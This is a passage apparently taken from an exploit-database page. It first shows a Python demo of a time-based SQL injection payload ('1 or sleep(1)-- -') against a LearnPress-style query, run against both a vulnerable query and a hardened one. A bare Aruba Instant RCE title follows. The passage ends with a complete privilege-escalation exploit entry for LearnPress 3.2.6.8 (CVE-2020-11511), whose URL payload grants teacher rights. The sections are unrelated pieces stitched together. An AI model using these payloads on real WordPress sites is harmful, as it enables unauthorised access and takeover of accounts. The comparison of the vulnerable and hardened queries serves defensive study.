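
PAYLOAD = "1 or sleep(1)-- -"  # the current_items[] value from the request above


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (ID INTEGER PRIMARY KEY, post_type TEXT, post_title TEXT)")
    conn.executemany("INSERT INTO posts VALUES (?, ?, ?)", [
        (1, "lp_course", "Intro"), (2, "lp_course", "Advanced"),
        (3, "lp_course", "Lab"), (4, "post", "Hello world"),
    ])
    return conn


def search_vulnerable(conn, current_items):
    """Assumed flawed shape: array values are joined straight into the SQL text."""
    sql = ("SELECT ID FROM posts WHERE post_type = 'lp_course' "
           "AND ID NOT IN (%s)" % ",".join(current_items))
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn, current_items):
    """Reject anything that is not an integer ID, then bind with placeholders."""
    ids = []
    for value in current_items:
        if not str(value).strip().isdigit():
            raise ValueError("current_items[] must be integer IDs, got %r" % value)
        ids.append(int(value))
    sql = "SELECT ID FROM posts WHERE post_type = 'lp_course'"
    if ids:
        sql += " AND ID NOT IN (%s)" % ",".join("?" * len(ids))
    return [row[0] for row in conn.execute(sql, ids)]


def try_search(fn, conn, current_items):
    """Run a search and report its rows, or the class of error it raised."""
    try:
        return ("ok", fn(conn, current_items))
    except (sqlite3.Error, ValueError) as exc:
        return ("error", type(exc).__name__)


if __name__ == "__main__":
    db = make_db()
    for fn in (search_vulnerable, search_safe):
        print(fn.__name__, try_search(fn, db, ["1"]), try_search(fn, db, [PAYLOAD]))
```

On MySQL the vulnerable variant would pause for the sleep() instead of erroring, which is why the PoC uses a time-based probe; the hardened variant never lets the string near the database.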
-
Aruba Instant (IAP) - Remote Code Execution
-
WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation
# Exploit Title: WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation
# Date: 07-17-2021
# Exploit Author: nhattruong or nhattruong.blog
# Vendor Homepage: https://thimpress.com/learnpress/
# Software Link: https://wordpress.org/plugins/learnpress/
# Version: < 3.2.6.9
# References link: https://wpscan.com/vulnerability/22b2cbaa-9173-458a-bc12-85e7c96961cd
# CVE: CVE-2020-11511

POC:
1. Find out your user id
2. Log in with your credentials
3. Execute the payload

http://<host>/wp-admin/?action=accept-to-be-teacher&user_id=<your_id>

# Done!